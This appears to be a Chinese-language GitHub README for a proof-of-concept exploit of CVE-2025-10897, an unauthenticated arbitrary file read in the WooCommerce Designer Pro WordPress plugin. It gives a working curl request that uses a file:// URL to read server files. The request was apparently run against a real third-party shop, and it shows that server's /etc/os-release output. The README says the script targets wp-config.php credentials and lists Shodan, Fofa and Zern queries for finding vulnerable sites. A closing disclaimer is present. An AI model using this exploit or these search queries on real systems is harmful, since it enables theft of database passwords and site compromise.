error-inside/CVE-2025-10897
GitHub: error-inside/CVE-2025-10897
CVE-2025-10897 漏洞的 Python PoC 脚本,用于验证 WooCommerce Designer Pro 插件中无需认证的任意文件读取缺陷。
Stars: 0 | Forks: 0
# CVE-2025-10897
[][01]
[][03]
[](./LICENSE)
[](./LICENSE)
[WooCommerce][07] 是一个用于 WordPress 的开源电子商务插件,可以将网站转变为在线商店。[WooCommerce Designer Pro][08] 是由 [JMA Plugins][08] 开发的一款 WordPress 插件,允许客户直接在 WooCommerce 商店中设计和定制产品。
**重要提示**:WooCommerce 和 WooCommerce Designer Pro 完全不同。
WooCommerce Designer Pro 支持创建名片、明信片、传单、海报、T恤、贴纸和其他可打印材料,具有 CMYK 颜色支持、PDF 生成和基于画布的设计界面等功能。
该插件与 WooCommerce 集成,允许在购买前进行实时产品定制,使其非常适合在线印刷业务和定制商品商店。
CVE-2025-10897 是 WooCommerce Designer Pro `1.9.28` 及更早版本中存在的一个无需身份验证的任意文件读取漏洞(CWE-22)。攻击者发送 `POST /wp-admin/admin-ajax.php`,带有 `action=wcdp_convert_resource_cmyk` 以及指向服务器文件(如 `/etc/passwd` 或 `wp-config.php`)的 `file://` URL。该插件会在 JSON 响应中返回文件内容。
这可能会在没有任何 WordPress 账户的情况下泄露 `wp-config.php` 中的数据库密码和其他机密信息。
## PoC
请求
```
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
```
响应
```
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}
```
Base64 解码后的响应:
```
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
```
## 用法
```
python CVE-2025-10897-X7.py
```
**注意**:我们的 PoC 脚本尝试获取 `wp-config.php`,但目标可能将 WordPress 安装在 `/var/www` 以外的位置。
用于搜索易受攻击服务器的参数
* [Zern][04] : `body:"wc-designer-pro"`
* [Fofa][05] : `body="wc-designer-pro"`
* [Shodan][06] : `http.body:"wc-designer-pro"`
## 资源
* [OpenCVE - WooCommerce Designer Pro <= 1.9.28 无需身份验证的任意文件读取][02]
* [NIST - CVE-2025-10897 详情][03]
* [WooCommerce 主页][07]
* [WooCommerce Designer Pro - 官方开发者网站][08]
* [WooCommerce Designer Pro - 官方市场][09]
* [Nuclei Templated - CVE-2025-10897][10]
## 免责声明
本仓库及其内容仅供合法的安全研究、授权的渗透测试、教育学习和防御目的使用。访问或使用本资料即表示您承认对确保您的活动符合所有适用法律负全部责任,并且在对您不拥有的任何系统进行测试或应用这些技术之前,您已获得适当的授权。
本项目的作者和维护者不对因应用此信息而产生的任何损害、法律后果或滥用承担任何责任。严禁并不支持任何用于未经授权的访问、恶意活动或非法目的的使用。
**负责任地使用**。**保持合法**。仅测试您拥有或获得明确书面许可进行测试的内容。
## 作者
* ErrorInside // SCT
## 许可证
SCT-PL
标签:CVE-2025-10897, PoC, WordPress插件, 任意文件读取, 文件完整性监控, 暴力破解, 逆向工具